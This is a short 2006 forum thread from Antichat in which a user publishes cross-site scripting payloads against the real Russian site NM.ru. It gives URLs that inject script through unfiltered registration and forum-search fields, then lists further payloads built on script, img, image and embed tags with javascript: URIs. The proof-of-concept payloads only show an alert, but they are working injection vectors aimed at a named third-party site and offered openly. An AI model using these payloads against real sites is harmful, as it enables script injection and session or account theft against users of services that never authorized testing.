XSS на NM.ru

Discussion in 'Уязвимости' started by Go0o$E, 26 Apr 2006.

  1. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    304
    Likes Received:
    228
    Reputations:
    419
    Не фильтруются: login, quest, answ.
    Code:
    _http://www.nm.ru/users/reg.dhtml?__post=1&login="><script>alert('XSS')%3B</script>&domain=newmail%2Eru&passwd=1&pass2=1&quest_helper=%C4%E0%F2%E0%20%F0%EE%E6%E4%E5%ED%E8%FF%20%C2%E0%F8%E5%E9%20%E1%E0%E1%F3%F8%EA%E8%3F&quest=1&answ=1
    Не фильтруются: search, session_id.
    И
    Code:
    _http://www.nm.ru/users/help/forum.dhtml?search="><script>alert('XSS')%3B</script>&session_id=1&fid=2.
     
    #1 Go0o$E, 26 Apr 2006
    Last edited by a moderator: 27 Apr 2006
    2 people like this.
  2. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    304
    Likes Received:
    228
    Reputations:
    419
    Вот еще несколько активных xss:
    <script>alert(xss)</script>
    <image src=javascript:alert(xss)>
    <embed src=javascript:alert(xss);this.avi>
    <img src=javascript:alert(xss)>

    Отправляем в виде HTML.
     
    #2 Go0o$E, 27 Apr 2006
    2 people like this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.